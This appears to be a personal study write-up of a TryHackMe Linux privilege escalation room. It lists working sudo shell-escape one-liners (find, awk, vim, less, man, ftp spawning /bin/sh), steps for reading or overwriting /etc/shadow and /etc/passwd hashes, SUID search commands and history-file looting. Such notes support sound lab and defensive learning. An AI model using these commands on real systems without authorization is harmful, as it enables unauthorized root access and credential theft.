Linux Privilege Escalation
Tib3rius Linux Privilege Escalation course from TryHackMe (with some overlap from TCM's arena)
TryHackMe – Linux PrivEsc Write-Up
topics: Linux Privilege Escalation, post exploitation (looting)
Service Exploits
File Permissions
Sudo Bypass
Cron Jobs
SUID/SGID Executables
Passwords & Keys
NFS
Kernel Exploits
new tools: unixprivesc, LinPrivchecker, strace, perl, env, function, export, perl, mount
tools: nmapAutomator, nc, gcc, strings, enum4linux, LinPEAS, LinEnum, LSE, chmod, touch, find, msfvenom
Overview of Linux Privilege Escalation
As with any operating system, there are numerous ways to take advantage of system processes, configuration files, outdated kernel versions, OS specific vulnerabilities etc.
some specific ones mentioned in the room, techniques generalization and commonalities
helpful links and pdf of linux pocket guide and other sources like arch wiki, open source books
Cheatsheets
Service Exploits
ps -elf | grep root
find all services and processes run by root
If we examine this command closely, we can see that it is running MySQL as the root user without a password defined. We can run commands through the service as the root user.
This information was taken from a known searchsploit exploit and is one of many examples of bypassing services run as root.
Weak File Permissions
/etc/shadow
This is the location of all hashed passwords of every user on the system including root. If these files are readable or writeable by the user, any password could be tampered with.
We can check our permissions with ls -la /etc/shadow
So we have read/write permissions for the file. We can view all password hashes and even change them. Lets read the file, store it in a text file and crack with john
Read
Write
We can make a new password using the $6$ encryption type (SHA-512) that we know googling or hash-identifier
. Use mkpasswd
and input the new password
/etc/passwd
This is the file that lists all system users and uid, as well as the home folder and default shell.
Checking permissions with ls -la /etc/passwd
We have read/write permissions for the user file. We can generate a new password hash and replace the x in the passwd file
We can also copy the contents of root and make a user newroot as an alias of root
Bypass Sudo
Shell Escape Sequences
GTFObins is collection of sudo, SUID and other bypass techniques that can be used for linux.
sudo -l
lists all commands the user can use with sudo permissions
We can become root by
vim using
sudo vim
followed by:!bash
(can also edit the sudoers file to include all)nmap using
sudo nmap --interactive
followed by!sh
iftop using
sudo iftop
followed by shift+! andCommand> /bin/sh
find using
sudo find . -exec /bin/sh \; -quit
nano using
sudo nano
, ctrl+Rctrl+X,reset sh 1>&0 2>&0
. Didnt work on this box but you can just edit the sudoers fileman using
sudo man man
followed by!/bin/sh
awk using
sudo awk 'BEGIN {system("/bin/sh")}'
less using
sudo less /etc/profile
followed by!/bin/sh
ftp using
sudo ftp
followed by!/bin/sh
more using
TERM= sudo more /etc/profile
followed by!/bin/sh
The list is almost endless.
Environment Variables
Cron Jobs
Cron jobs are programs or scripts which users can schedule to run at specific times or intervals. Cron table files (crontabs) store the configuration for cron jobs. The system-wide crontab is located at /etc/crontab.
Useful commands:
File Permissions
View system-wide cron tables: cat /etc/crontab
PATH Environment Variable
cat /etc/crontab
Wildcards
cat /etc/crontab && cat /usr/local/bin/compress.sh
The tar
command is being used with a wildcard *
SUID/SGID Executables
An SUID is a file that allows a user to execute the file with the permissions of the file owner, an SGID is the same except with the group owner. If the owner is root, we can essentially run files with root permissions.
Known Exploits
find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
find all SUID files
find / -perm -g=s -type f 2>/dev/null
find all SGID files
SUID file misconfigurations can be found on GTFOBins
Shared Object Injection
Environment Variables
Exploiting Shell Features
The following doesn't work for bash versions 4.4+ /bin/bash --version
Passwords & Keys
History Files
cat ~/.*history | less
Configuration Files
SSH Keys
NFS
Kernel Exploits
*Privilege Escalation Scripts
Numerous scripts we can use yada yada, Linux executables use the file extension .sh, we can search for these first
Find any file type using find . -type f -name '*.<FILETYPE>'
LinEnum
LinPEAS
LSE
Linux Exploit Suggestor 2
Unix PrivEsc
Linux PrivChecker
Last updated